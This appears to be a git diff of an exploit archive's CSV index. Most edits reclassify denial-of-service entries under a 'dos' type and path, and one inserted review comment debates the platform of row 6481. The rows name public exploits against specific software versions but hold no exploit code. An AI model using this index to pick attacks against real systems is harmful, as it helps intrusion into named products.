diff --git a/files.csv b/files.csv
index d2c3a02c1..b50c75fab 100755
--- a/files.csv
+++ b/files.csv
@@ -567,7 +567,7 @@ id,file,description,date,author,platform,type,port
 734,platforms/windows/remote/734.c,"Microsoft Windows NetDDE Remote Buffer Overflow Exploit (MS04-031)",2004-12-31,houseofdabus,windows,remote,139
 736,platforms/windows/dos/736.c,"SOLDNER Secret Wars <= 30830 - Denial of Service Exploit",2005-01-04,"Luigi Auriemma",windows,dos,20000
 737,platforms/php/webapps/737.txt,"QWikiwiki Directory Traversal Vulnerability",2005-01-04,Madelman,php,webapps,0
-738,platforms/php/webapps/738.c,"iWebNegar Configuration Nullification Denial of Service Exploit",2005-01-04,c0d3r,php,webapps,0
+738,platforms/php/dos/738.c,"iWebNegar 1.1 - Configuration Nullification Denial of Service Exploit",2005-01-04,c0d3r,php,dos,0
 739,platforms/bsd/local/739.c,"FreeBSD TOP Format String Vulnerability",2001-07-23,truefinder,bsd,local,0
 740,platforms/php/webapps/740.pl,"phpBB <= 2.0.10 Bot Install (Altavista) (ssh.D.Worm)",2005-01-04,"Severino Honorato",php,webapps,0
 741,platforms/linux/local/741.pl,"HTGET <= 0.9.x - Local Root Exploit",2005-01-05,nekd0,linux,local,0
@@ -639,7 +639,7 @@ id,file,description,date,author,platform,type,port
 814,platforms/php/webapps/814.txt,"MercuryBoard <= 1.1.1 Working SQL Injection",2005-02-12,Zeelock,php,webapps,0
 815,platforms/linux/dos/815.c,"CA BrightStor ARCserve Backup Remote Buffer Overlow PoC",2005-02-12,cybertronic,linux,dos,0
 816,platforms/linux/local/816.c,"GNU a2ps _Anything to PostScript_ Local Exploit (not suid)",2005-02-13,lizard,linux,local,0
-817,platforms/cgi/webapps/817.pl,"AwStats <= 6.4 - Denial of Service",2005-02-14,GHC,cgi,webapps,0
+817,platforms/cgi/dos/817.pl,"AwStats <= 6.4 - Denial of Service",2005-02-14,GHC,cgi,dos,0
 818,platforms/php/webapps/818.txt,"vBulletin <= 3.0.4 - _forumdisplay.php_ Code Execution",2005-02-14,AL3NDALEEB,php,webapps,0
 819,platforms/windows/remote/819.py,"Savant Web Server 3.1 - Remote BoF (French Win OS support)",2005-02-15,"Jerome Athias",windows,remote,80
 820,platforms/php/webapps/820.php,"vBulletin <= 3.0.4 - _forumdisplay.php_ Code Execution (part 2)",2005-02-15,AL3NDALEEB,php,webapps,0
@@ -870,8 +870,8 @@ id,file,description,date,author,platform,type,port
 1060,platforms/php/webapps/1060.pl,"Forum Russian Board 4.2 Full Command Execution Exploit",2005-06-21,RusH,php,webapps,0
 1061,platforms/php/webapps/1061.pl,"Mambo <= 4.5.2.1 - SQL Injection Exploit",2005-06-21,RusH,php,webapps,0
 1062,platforms/php/webapps/1062.pl,"Cacti <= 0.8.6d Remote Command Execution Exploit",2005-06-22,"Alberto Trivero",php,webapps,0
-1063,platforms/php/webapps/1063.pl,"phpBB <= 2.0.15 Register Multiple Users Denial of Service (perl code)",2005-06-22,g30rg3_x,php,webapps,0
-1064,platforms/php/webapps/1064.c,"phpBB <= 2.0.15 Register Multiple Users Denial of Service (c code)",2005-06-22,HaCkZaTaN,php,webapps,0
+1063,platforms/php/dos/1063.pl,"phpBB <= 2.0.15 - Register Multiple Users Denial of Service (Perl Code)",2005-06-22,g30rg3_x,php,dos,0
+1064,platforms/php/dos/1064.c,"phpBB <= 2.0.15 - Register Multiple Users Denial of Service (C Code)",2005-06-22,HaCkZaTaN,php,dos,0
 1065,platforms/windows/dos/1065.c,"Microsoft Windows - (SMB) Transaction Response Handling Exploit (MS05-011)",2005-06-23,cybertronic,windows,dos,0
 1066,platforms/windows/remote/1066.cpp,"Microsoft Outlook Express NNTP Buffer Overflow Exploit (MS05-030)",2005-06-24,eyas,windows,remote,0
 1067,platforms/windows/dos/1067.cpp,"TCP-IP Datalook <= 1.3 - Local Denial of Service Exploit",2005-06-25,basher13,windows,dos,0
@@ -956,7 +956,7 @@ id,file,description,date,author,platform,type,port
 1153,platforms/hardware/dos/1153.pl,"Grandstream Budge Tone 101/102 VOIP Phone Denial of Service Exploit",2005-08-12,"Pierre Kroma",hardware,dos,0
 1154,platforms/linux/local/1154.pl,"Operator Shell (osh) 1.7-13 - Local Root Exploit",2005-08-16,"Charles Stevenson",linux,local,0
 1156,platforms/windows/dos/1156.c,"Chris Moneymakers World Poker Championship 1.0 DoS Exploit",2005-08-17,"Luigi Auriemma",windows,dos,0
-1157,platforms/cgi/webapps/1157.pl,"GTChat <= 0.95 Alpha Remote Denial of Service Exploit",2005-08-18,RusH,cgi,webapps,0
+1157,platforms/cgi/dos/1157.pl,"GTChat <= 0.95 Alpha - Remote Denial of Service Exploit",2005-08-18,RusH,cgi,dos,0
 1158,platforms/windows/dos/1158.pl,"WS_FTP Server <= 5.03 (RNFR) Buffer Overflow Exploit",2004-11-29,"Reed Arvin",windows,dos,0
 1159,platforms/windows/dos/1159.pl,"Mercury/32 Mail Server <= 4.01a (check) Buffer Overflow Exploit",2004-12-01,"Reed Arvin",windows,dos,0
 1160,platforms/windows/dos/1160.pl,"Golden FTP Server Pro <= 2.52 - (USER) Remote Buffer Overflow Exploit",2005-04-27,"Reed Arvin",windows,dos,0
@@ -973,14 +973,14 @@ id,file,description,date,author,platform,type,port
 1172,platforms/php/webapps/1172.pl,"MyBulletinBoard (MyBB) <= 1.00 RC4 SQL Injection Exploit",2005-08-22,Alpha_Programmer,php,webapps,0
 1173,platforms/windows/local/1173.c,"Mercora IMRadio <= 4.0.0.0 - Local Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0
 1174,platforms/windows/local/1174.c,"ZipTorrent <= 1.3.7.3 - Local Proxy Password Disclosure Exploit",2005-08-22,Kozan,windows,local,0
-1175,platforms/cgi/webapps/1175.pl,"GTChat <= 0.95 Alpha (adduser) Remote Denial of Service Exploit",2005-08-23,VTECin5th,cgi,webapps,0
+1175,platforms/cgi/dos/1175.pl,"GTChat <= 0.95 Alpha - (adduser) Remote Denial of Service Exploit",2005-08-23,VTECin5th,cgi,dos,0
 1176,platforms/multiple/dos/1176.c,"Ventrilo <= 2.3.0 - Remote Denial of Service Exploit (all platforms)",2005-08-23,"Luigi Auriemma",multiple,dos,0
 1178,platforms/windows/remote/1178.c,"Microsoft Windows IIS 5.0 - (500-100.asp) Server Name Spoof Exploit",2005-08-25,Lympex,windows,remote,0
 1179,platforms/windows/remote/1179.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (spanish fix)",2005-08-25,RoMaNSoFt,windows,remote,445
 1180,platforms/windows/remote/1180.c,"Microsoft Windows Plug-and-Play Service Remote Universal Exploit (French Fix)",2005-08-25,"Fabrice Mourron",windows,remote,445
 1181,platforms/linux/local/1181.c,"MySQL 4.0.17 - UDF Dynamic Library Exploit",2004-12-24,"Marco Ivaldi",linux,local,0
 1182,platforms/solaris/local/1182.c,"Solaris 2.6/7/8/9 (ld.so.1) Local Root Exploit (sparc)",2004-12-24,"Marco Ivaldi",solaris,local,0
-1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) Login Bypass/Pass Stealer/DoS Exploit",2005-08-29,"Luigi Auriemma",windows,remote,0
+1183,platforms/windows/remote/1183.c,"Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/DoS Exploit",2005-08-29,"Luigi Auriemma",windows,remote,0
 1184,platforms/windows/remote/1184.c,"Savant Web Server 3.1 - Remote Buffer Overflow Exploit",2005-08-30,basher13,windows,remote,80
 1185,platforms/osx/local/1185.pl,"Adobe Version Cue 1.0/1.0.1 - Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0
 1186,platforms/osx/local/1186.c,"Adobe Version Cue 1.0/1.0.1 - (-lib) Local Root Exploit (OSX)",2005-08-30,vade79,osx,local,0
@@ -1118,7 +1118,7 @@ id,file,description,date,author,platform,type,port
 1341,platforms/windows/dos/1341.c,"Microsoft Windows MSDTC Service Remote Memory Modification PoC (MS05-051)",2005-11-27,darkeagle,windows,dos,0
 1342,platforms/php/webapps/1342.php,"Guppy <= 4.5.9 (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0
 1343,platforms/windows/dos/1343.c,"Microsoft Windows Metafile (gdi32.dll) Denial of Service Exploit (MS05-053)",2005-11-29,"Winny Thomas",windows,dos,0
-1345,platforms/php/webapps/1345.php,"Xaraya <= 1.0.0 RC4 create() Denial of Service Exploit",2005-11-29,rgod,php,webapps,0
+1345,platforms/php/dos/1345.php,"Xaraya <= 1.0.0 RC4 - create() Denial of Service Exploit",2005-11-29,rgod,php,dos,0
 1346,platforms/windows/dos/1346.c,"Microsoft Windows Metafile - (mtNoObjects) Denial of Service Exploit (MS05-053)",2005-11-30,"Winny Thomas",windows,dos,0
 1347,platforms/qnx/local/1347.c,"QNX RTOS 6.3.0 (phgrafx) Local Buffer Overflow Exploit (x86)",2005-11-30,"p. minervini",qnx,local,0
 1352,platforms/windows/remote/1352.cpp,"Microsoft Windows DTC Remote Exploit (PoC) (MS05-051) (updated)",2005-12-01,Swan,windows,remote,0
@@ -1257,7 +1257,7 @@ id,file,description,date,author,platform,type,port
 1514,platforms/asp/webapps/1514.pl,"MiniNuke <= 1.8.2b (pages.asp) Remote SQL Injection Exploit",2006-02-19,nukedx,asp,webapps,0
 1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - (error.log) Remote Commands Execution Exploit (gpc = Off)",2006-02-20,rgod,php,webapps,0
 1516,platforms/php/webapps/1516.php,"ilchClan <= 1.05g (tid) Remote SQL Injection Exploit",2006-02-20,x128,php,webapps,0
-1517,platforms/php/webapps/1517.c,"PunBB <= 2.0.10 (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,webapps,0
+1517,platforms/php/dos/1517.c,"PunBB <= 2.0.10 - (Register Multiple Users) Denial of Service Exploit",2006-02-20,K4P0,php,dos,0
 1518,platforms/linux/local/1518.c,"MySQL 4.x/5.0 - User-Defined Function Local Privilege Escalation Exploit",2006-02-20,"Marco Ivaldi",linux,local,0
 1519,platforms/osx/remote/1519.pm,"Mac OS X Safari Browser (Safe File) Remote Code Execution Exploit",2006-02-22,"H D Moore",osx,remote,0
 1520,platforms/windows/remote/1520.pl,"Microsoft Windows Media Player - Plugin Overflow Exploit (MS06-006) (3)",2006-02-22,"Matthew Murphy",windows,remote,0
@@ -1312,7 +1312,7 @@ id,file,description,date,author,platform,type,port
 1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x - (date) Remote Code Execution Vulnerability",2006-03-09,Hessam-x,php,webapps,0
 1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 (Create Admin Bypass) Remote Exploit",2006-03-09,nukedx,asp,webapps,0
 1572,platforms/multiple/dos/1572.pl,"Dropbear / OpenSSH Server (MAX_UNAUTH_CLIENTS) Denial of Service",2006-03-10,str0ke,multiple,dos,0
-1573,platforms/php/webapps/1573.php,"Guppy <= 4.5.11 (Delete Databases) Remote Denial of Service Exploit",2006-03-10,trueend5,php,webapps,0
+1573,platforms/php/dos/1573.php,"Guppy <= 4.5.11 - (Delete Databases) Remote Denial of Service Exploit",2006-03-10,trueend5,php,dos,0
 1574,platforms/linux/remote/1574.c,"PeerCast <= 0.1216 (nextCGIarg) Remote Buffer Overflow Exploit",2006-03-11,prdelka,linux,remote,7144
 1575,platforms/php/webapps/1575.pl,"GuestBook Script <= 1.7 (include_files) Remote Code Execution Exploit",2006-03-11,rgod,php,webapps,0
 1576,platforms/php/webapps/1576.txt,"Jupiter CMS <= 1.1.5 - Multiple XSS Attack Vectors",2006-03-11,Nomenumbra,php,webapps,0
@@ -1382,7 +1382,7 @@ id,file,description,date,author,platform,type,port
 1646,platforms/php/webapps/1646.php,"phpMyChat <= 0.14.5 (SYS enter) Remote Code Execution Exploit",2006-04-05,rgod,php,webapps,0
 1647,platforms/php/webapps/1647.php,"phpMyChat 0.15.0dev (SYS enter) Remote Code Execution Exploit",2006-04-06,rgod,php,webapps,0
 1650,platforms/php/webapps/1650.pl,"Horde Help Viewer <= 3.1 - Remote Command Execution Exploit",2006-04-07,deese,php,webapps,0
-1651,platforms/php/webapps/1651.php,"ADODB < 4.70 (tmssql.php) Denial of Service Vulnerability",2006-04-09,rgod,php,webapps,0
+1651,platforms/php/dos/1651.php,"ADODB < 4.70 - (tmssql.php) Denial of Service Vulnerability",2006-04-09,rgod,php,dos,0
 1652,platforms/php/webapps/1652.php,"ADODB < 4.70 (PhpOpenChat 3.0.x) Server.php SQL Injection Exploit",2006-04-09,rgod,php,webapps,0
 1653,platforms/php/webapps/1653.txt,"dnGuestbook <= 2.0 - Remote SQL Injection Vulnerabilities",2006-04-09,snatcher,php,webapps,0
 1654,platforms/php/webapps/1654.txt,"autonomous lan party <= 0.98.1.0 - Remote File Inclusion Vulnerability",2006-04-09,Codexploder,php,webapps,0
@@ -1418,7 +1418,7 @@ id,file,description,date,author,platform,type,port
 1694,platforms/php/webapps/1694.pl,"Internet PhotoShow (page) - Remote File Inclusion Exploit",2006-04-18,Hessam-x,php,webapps,0
 1695,platforms/php/webapps/1695.pl,"PHP Net Tools <= 2.7.1 - Remote Code Execution Exploit",2006-04-18,FOX_MULDER,php,webapps,0
 1697,platforms/php/webapps/1697.php,"PCPIN Chat <= 5.0.4 (login/language) Remote Code Execution Exploit",2006-04-19,rgod,php,webapps,0
-1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0
+1698,platforms/php/webapps/1698.php,"Mambo <= 4.5.3 & Joomla <= 1.0.7 - (feed) Path Disclosure & Denial of Service Exploit",2006-04-19,trueend5,php,webapps,0
 1699,platforms/php/webapps/1699.txt,"RechnungsZentrale V2 <= 1.1.3 - Remote Inclusion Vulnerability",2006-04-19,"GroundZero Security",php,webapps,0
 1700,platforms/asp/webapps/1700.pl,"ASPSitem <= 1.83 (Haberler.asp) Remote SQL Injection Exploit",2006-04-19,nukedx,asp,webapps,0
 1701,platforms/php/webapps/1701.php,"PHPSurveyor <= 0.995 (surveyid) Remote Command Execution Exploit",2006-04-20,rgod,php,webapps,0
@@ -1709,7 +1709,7 @@ id,file,description,date,author,platform,type,port
 2001,platforms/windows/dos/2001.c,"Microsoft Word 2000/2003 Unchecked Boundary Condition Vulnerability",2006-07-10,"naveed afzal",windows,dos,0
 2002,platforms/php/webapps/2002.pl,"EJ3 TOPo 2.2 (descripcion) Remote Command Execution Exploit",2006-07-10,Hessam-x,php,webapps,0
 2003,platforms/php/webapps/2003.txt,"SQuery <= 4.5 (gore.php) Remote File Inclusion Vulnerability",2006-07-10,SHiKaA,php,webapps,0
-2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0
+2004,platforms/linux/local/2004.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (1)",2006-07-11,"dreyer & RoMaNSoFt",linux,local,0
 2005,platforms/linux/local/2005.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (2)",2006-07-12,"Julien Tinnes",linux,local,0
 2006,platforms/linux/local/2006.c,"Linux Kernel 2.6.13 <= 2.6.17.4 - sys_prctl() Local Root Exploit (3)",2006-07-13,"Marco Ivaldi",linux,local,0
 2007,platforms/php/webapps/2007.php,"phpBB 3 (memberlist.php) Remote SQL Injection Exploit",2006-07-13,rgod,php,webapps,0
@@ -2429,7 +2429,7 @@ id,file,description,date,author,platform,type,port
 2739,platforms/php/webapps/2739.txt,"iPrimal Forums (admin/index.php) Remote File Include Vulnerability",2006-11-08,Bl0od3r,php,webapps,0
 2740,platforms/php/webapps/2740.txt,"vBlog / C12 0.1 (cfgProgDir) Remote File Include Vulnerabilities",2006-11-08,DeltahackingTEAM,php,webapps,0
 2741,platforms/php/webapps/2741.txt,"IrayoBlog 0.2.4 (inc/irayofuncs.php) Remote File Include Vulnerability",2006-11-08,DeltahackingTEAM,php,webapps,0
-2742,platforms/php/webapps/2742.txt,"DodosMail <= 2.0.1 (dodosmail.php) Remote File Include Vulnerability",2006-11-08,"Cold Zero",php,webapps,0
+2742,platforms/php/webapps/2742.txt,"DodosMail <= 2.0.1 - (dodosmail.php) Remote File Include Vulnerability",2006-11-08,"Cold Zero",php,webapps,0
 2743,platforms/windows/remote/2743.html,"Microsoft Internet Explorer 6/7 (XML Core Services) Remote Code Execution Exploit",2006-11-08,N/A,windows,remote,0
 2744,platforms/php/webapps/2744.txt,"LetterIt 2.0 - (inc/session.php) Remote File Include Vulnerability",2006-11-09,v1per-haCker,php,webapps,0
 2745,platforms/php/webapps/2745.txt,"gtcatalog <= 0.9.1 (index.php) Remote File Include Vulnerability",2006-11-09,v1per-haCker,php,webapps,0
@@ -2480,7 +2480,7 @@ id,file,description,date,author,platform,type,port
 2790,platforms/php/webapps/2790.pl,"Etomite CMS <= 0.6.1.2 (manager/index.php) Local File Include Exploit",2006-11-16,Revenge,php,webapps,0
 2791,platforms/php/webapps/2791.txt,"HTTP Upload Tool (download.php) Information Disclosure Vulnerability",2006-11-16,"Craig Heffner",php,webapps,0
 2794,platforms/php/webapps/2794.txt,"mg.applanix <= 1.3.1 (apx_root_path) Remote File Include Vulnerabilities",2006-11-17,v1per-haCker,php,webapps,0
-2795,platforms/php/webapps/2795.txt,"DoSePa 1.0.4 (textview.php) Information Disclosure Vulnerability",2006-11-17,"Craig Heffner",php,webapps,0
+2795,platforms/php/webapps/2795.txt,"DoSePa 1.0.4 - (textview.php) Information Disclosure Vulnerability",2006-11-17,"Craig Heffner",php,webapps,0
 2796,platforms/php/webapps/2796.php,"miniCWB <= 1.0.0 (contact.php) Local File Include Exploit",2006-11-17,Kacper,php,webapps,0
 2797,platforms/php/webapps/2797.txt,"Powies pForum <= 1.29a (editpoll.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0
 2798,platforms/php/webapps/2798.txt,"Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability",2006-11-17,SHiKaA,php,webapps,0
@@ -2890,7 +2890,7 @@ id,file,description,date,author,platform,type,port
 3220,platforms/windows/local/3220.c,"Multiple Printer Providers (spooler service) - Privilege Escalation Exploit",2007-01-29,"Andres Tarasco",windows,local,0
 3221,platforms/php/webapps/3221.php,"GuppY <= 4.5.16 - Remote Commands Execution Exploit",2007-01-29,rgod,php,webapps,0
 3222,platforms/php/webapps/3222.txt,"Webfwlog <= 0.92 (debug.php) Remote File Disclosure Vulnerability",2007-01-29,GoLd_M,php,webapps,0
-3223,platforms/cgi/webapps/3223.pl,"CVSTrac 2.0.0 Post-Attack Database Resurrection DoS Exploit",2007-01-29,"Ralf S. Engelschall",cgi,webapps,0
+3223,platforms/cgi/dos/3223.pl,"CVSTrac 2.0.0 - Post-Attack Database Resurrection DoS Exploit",2007-01-29,"Ralf S. Engelschall",cgi,dos,0
 3224,platforms/windows/dos/3224.c,"Intel 2200BG 802.11 disassociation packet Kernel Memory Corruption",2007-01-29,"Breno Silva Pinto",windows,dos,0
 3225,platforms/php/webapps/3225.pl,"Galeria Zdjec <= 3.0 (zd_numer.php) Local File Include Exploit",2007-01-30,ajann,php,webapps,0
 3226,platforms/php/webapps/3226.txt,"PHPFootball 1.6 (show.php) Remote Database Disclosure Vulnerability",2007-01-30,ajann,php,webapps,0
@@ -5701,7 +5701,7 @@ id,file,description,date,author,platform,type,port
 6086,platforms/php/webapps/6086.txt,"Joomla Component DT Register Remote SQL Injection Vulnerability",2008-07-16,His0k4,php,webapps,0
 6087,platforms/php/webapps/6087.txt,"AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability",2008-07-16,"Hussin X",php,webapps,0
 6088,platforms/php/webapps/6088.txt,"tplSoccerSite 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-07-16,Mr.SQL,php,webapps,0
-6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector Code Execution / Denial of Service Exploit",2008-07-17,kingcope,windows,remote,80
+6089,platforms/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service Exploit",2008-07-17,kingcope,windows,remote,80
 6090,platforms/windows/dos/6090.html,"PPMate PPMedia Class ActiveX Control Buffer Overflow PoC",2008-07-17,"Guido Landi",windows,dos,0
 6091,platforms/php/webapps/6091.txt,"phpHoo3 <= 5.2.6 - (phpHoo3.php viewCat) SQL Injection Vulnerability",2008-07-17,Mr.SQL,php,webapps,0
 6092,platforms/php/webapps/6092.txt,"AlstraSoft Video Share Enterprise 4.5.1 (UID) SQL Injection Vulnerability",2008-07-17,"Hussin X",php,webapps,0
@@ -6053,7 +6053,7 @@ id,file,description,date,author,platform,type,port
 6477,platforms/hardware/remote/6477.html,"Cisco Router - HTTP Administration CSRF Command Execution Exploit (2)",2008-09-17,"Jeremy Brown",hardware,remote,0
 6478,platforms/php/webapps/6478.txt,"Technote 7 (shop_this_skin_path) Remote File Inclusion Vulnerability",2008-09-17,webDEViL,php,webapps,0
 6480,platforms/php/webapps/6480.txt,"x10media mp3 - search engine 1.5.5 - Remote File Inclusion Vulnerability",2008-09-17,THUNDER,php,webapps,0
-6481,platforms/php/webapps/6481.c,"Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC",2008-09-17,LiquidWorm,php,webapps,0
+6481,platforms/php/dos/6481.c,"Femitter FTP Server 1.03 - (RETR) Remote Denial of Service Exploit PoC",2008-09-17,LiquidWorm,php,dos,0
 6482,platforms/php/webapps/6482.txt,"addalink <= 4 Write Approved Links Remote Vulnerability",2008-09-17,Pepelux,php,webapps,0
 6483,platforms/php/webapps/6483.txt,"E-Php CMS (article.php es_id) Remote SQL Injection Vulnerability",2008-09-18,HaCkeR_EgY,php,webapps,0
 6485,platforms/php/webapps/6485.txt,"addalink <= 4 (category_id) Remote SQL Injection Vulnerability",2008-09-18,ka0x,php,webapps,0
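Review bot: The new 6481 row keeps `php` in the platform column and in the path (`platforms/php/dos/6481.c`) while the entry is a C proof-of-concept against an FTP server, which looks inconsistent with how this file keys server DoS entries to the target's OS (1160 and 10073, both `windows/dos`, the latter moved in this same commit). If the platform column was wrong before, the move is the moment to correct it rather than carry it into the new path. Assuming the server in question is a Windows product, the row would read `6481,platforms/windows/dos/6481.c,"Femitter FTP Server 1.03 - (RETR) Remote Denial of Service Exploit PoC",2008-09-17,LiquidWorm,windows,dos,0`; the target platform should be confirmed against the exploit file before changing it.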
@@ -6169,7 +6169,7 @@ id,file,description,date,author,platform,type,port
 6596,platforms/php/webapps/6596.txt,"E-Uploader Pro <= 1.0 - Multiple Remote SQL Injection Vulnerabilities",2008-09-27,~!Dok_tOR!~,php,webapps,0
 6598,platforms/php/webapps/6598.txt,"CoAST 0.95 (sections_file) Remote File Inclusion Vulnerability",2008-09-27,DaRkLiFe,php,webapps,0
 6599,platforms/php/webapps/6599.txt,"Real Estate Manager (cat_id) Remote SQL Injection Vulnerability",2008-09-27,CraCkEr,php,webapps,0
-6600,platforms/windows/remote/6600.html,"Chilkat IMAP ActiveX 7.9 File Execution / IE DoS Exploit",2008-09-27,e.wiZz!,windows,remote,0
+6600,platforms/windows/remote/6600.html,"Chilkat IMAP ActiveX 7.9 - File Execution / IE DoS Exploit",2008-09-27,e.wiZz!,windows,remote,0
 6601,platforms/php/webapps/6601.txt,"LnBlog <= 0.9.0 (plugin) Local File Inclusion Vulnerability",2008-09-27,dun,php,webapps,0
 6602,platforms/php/webapps/6602.txt,"PlugSpace 0.1 (index.php navi) Local File Inclusion Vulnerability",2008-09-27,dun,php,webapps,0
 6603,platforms/php/webapps/6603.txt,"MyCard 1.0.2 (gallery.php id) Remote SQL Injection Vulnerability",2008-09-27,r45c4l,php,webapps,0
@@ -7080,7 +7080,7 @@ id,file,description,date,author,platform,type,port
 7537,platforms/php/webapps/7537.txt,"BLOG 1.55B (image_upload.php) Arbitrary File Upload Vulnerability",2008-12-21,Piker,php,webapps,0
 7538,platforms/php/webapps/7538.txt,"Joomla Component com_hbssearch 1.0 - Blind SQL Injection Vuln",2008-12-21,boom3rang,php,webapps,0
 7539,platforms/php/webapps/7539.txt,"Joomla Component com_tophotelmodule 1.0 - Blind SQL Injection Vuln",2008-12-21,boom3rang,php,webapps,0
-7540,platforms/php/webapps/7540.txt,"phpg 1.6 (xss/pd/dos) Multiple Vulnerabilities",2008-12-21,"Anarchy Angel",php,webapps,0
+7540,platforms/php/webapps/7540.txt,"phpg 1.6 - (XSS/Path Disclosure/DoS) Multiple Vulnerabilities",2008-12-21,"Anarchy Angel",php,webapps,0
 7541,platforms/php/webapps/7541.pl,"RSS Simple News (news.php pid) Remote SQL Injection Exploit",2008-12-22,Piker,php,webapps,0
 7542,platforms/php/webapps/7542.txt,"Text Lines Rearrange Script - (filename) File Disclosure Vulnerability",2008-12-22,SirGod,php,webapps,0
 7543,platforms/php/webapps/7543.txt,"Wordpress Plugin Page Flip Image Gallery <= 0.2.2 - Remote FD Vuln",2008-12-22,GoLd_M,php,webapps,0
@@ -7373,7 +7373,7 @@ id,file,description,date,author,platform,type,port
 7835,platforms/php/webapps/7835.htm,"Max.Blog 1.0.6 - Arbitrary Delete Post Exploit",2009-01-20,SirGod,php,webapps,0
 7836,platforms/php/webapps/7836.txt,"AJ Auction Pro OOPD 2.3 - (id) SQL Injection Vulnerability",2009-01-20,snakespc,php,webapps,0
 7837,platforms/php/webapps/7837.pl,"LinPHA Photo Gallery 2.0 - Remote Command Execution Exploit",2009-01-20,Osirys,php,webapps,0
-7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 (dodosquiz.php) Local File Inclusion Vulnerability",2009-01-20,Stack,php,webapps,0
+7838,platforms/php/webapps/7838.txt,"Dodo's Quiz Script 1.1 - (dodosquiz.php) Local File Inclusion Vulnerability",2009-01-20,Stack,php,webapps,0
 7839,platforms/windows/local/7839.py,"Total Video Player 1.31 (DefaultSkin.ini) Local Stack Overflow Exploit",2009-01-20,His0k4,windows,local,0
 7840,platforms/php/webapps/7840.pl,"Joomla Com BazaarBuilder Shopping Cart 5.0 - SQL Injection Exploit",2009-01-21,XaDoS,php,webapps,0
 7841,platforms/php/webapps/7841.txt,"Mambo Component SOBI2 RC 2.8.2 (bid) SQL Injection Vulnerability",2009-01-21,"Br1ght D@rk",php,webapps,0
@@ -9220,7 +9220,7 @@ id,file,description,date,author,platform,type,port
 9828,platforms/php/webapps/9828.txt,"OSSIM 2.1 - SQL Injection and xss",2009-09-23,"Alexey Sintsov",php,webapps,0
 9829,platforms/multiple/remote/9829.txt,"nginx 0.7.61 - WebDAV Directory Traversal",2009-09-23,kingcope,multiple,remote,80
 9830,platforms/php/webapps/9830.txt,"Cour Supreme SQL Injection",2009-09-23,"CrAzY CrAcKeR",php,webapps,0
-9831,platforms/windows/local/9831.txt,"Avast Antivirus 4.8.1351.0 DoS and Privilege Escalation",2009-09-23,Evilcry,windows,local,0
+9831,platforms/windows/local/9831.txt,"Avast Antivirus 4.8.1351.0 - DoS and Privilege Escalation",2009-09-23,Evilcry,windows,local,0
 9832,platforms/php/webapps/9832.txt,"Joomla/Mambo Tupinambis SQL Injection",2009-09-22,"Don Tukulesto",php,webapps,0
 9833,platforms/php/webapps/9833.txt,"Joomla com_facebook - SQL Injection",2009-09-22,kaMtiEz,php,webapps,0
 9834,platforms/asp/webapps/9834.txt,"BPLawyerCaseDocuments SQL Injection",2009-09-22,"OoN Boy",asp,webapps,0
@@ -9234,7 +9234,7 @@ id,file,description,date,author,platform,type,port
 9842,platforms/php/local/9842.txt,"PHP 5.3.0 - pdflib Arbitrary File Write",2009-11-06,"Sina Yazdanmehr",php,local,0
 9843,platforms/multiple/remote/9843.txt,"Blender 2.34 / 2.35a / 2.4 / 2.49b - (.blend) Command Injection",2009-11-05,"Core Security",multiple,remote,0
 9844,platforms/linux/local/9844.py,"Linux Kernel 2.4.1-2.4.37 and 2.6.1-2.6.32-rc5 - Pipe.c Privelege Escalation",2009-11-05,"Matthew Bergin",linux,local,0
-9845,platforms/osx/local/9845.c,"OSX 10.5.6-10.5.7 ptrace mutex DoS",2009-11-05,prdelka,osx,local,0
+9845,platforms/osx/dos/9845.c,"OSX 10.5.6-10.5.7 - ptrace mutex DoS",2009-11-05,prdelka,osx,dos,0
 9847,platforms/php/webapps/9847.txt,"Portili Personal and Team Wiki <= 1.14 - Multiple Vulnerabilities",2009-11-04,Abysssec,php,webapps,0
 9849,platforms/php/webapps/9849.php,"PunBB Extension Attachment <= 1.0.2 - SQL Injection",2009-11-03,puret_t,php,webapps,0
 9850,platforms/php/webapps/9850.txt,"Xerox Fiery Webtools SQL Injection",2009-11-03,"Bernardo Trigo",php,webapps,0
@@ -9254,10 +9254,10 @@ id,file,description,date,author,platform,type,port
 9865,platforms/windows/local/9865.py,"Adobe Acrobat Reader 7-9 - U3D BoF",2009-10-27,"Felipe Andres Manzano",windows,local,0
 9866,platforms/windows/local/9866.txt,"Alleycode HTML Editor 2.2.1 BoF",2009-10-29,Dr_IDE,windows,local,0
 9867,platforms/php/webapps/9867.txt,"Amiro.CMS <= 5.4.0.0 folder disclosure",2009-10-19,"Vladimir Vorontsov",php,webapps,0
-9871,platforms/windows/local/9871.txt,"Boloto Media Player 1.0.0.9 pls file DoS",2009-10-27,Dr_IDE,windows,local,0
+9871,platforms/windows/dos/9871.txt,"Boloto Media Player 1.0.0.9 - pls file DoS",2009-10-27,Dr_IDE,windows,dos,0
 9872,platforms/multiple/webapps/9872.txt,"boxalino 09.05.25-0421 - Directory Traversal",2009-10-20,"Axel Neumann",multiple,webapps,0
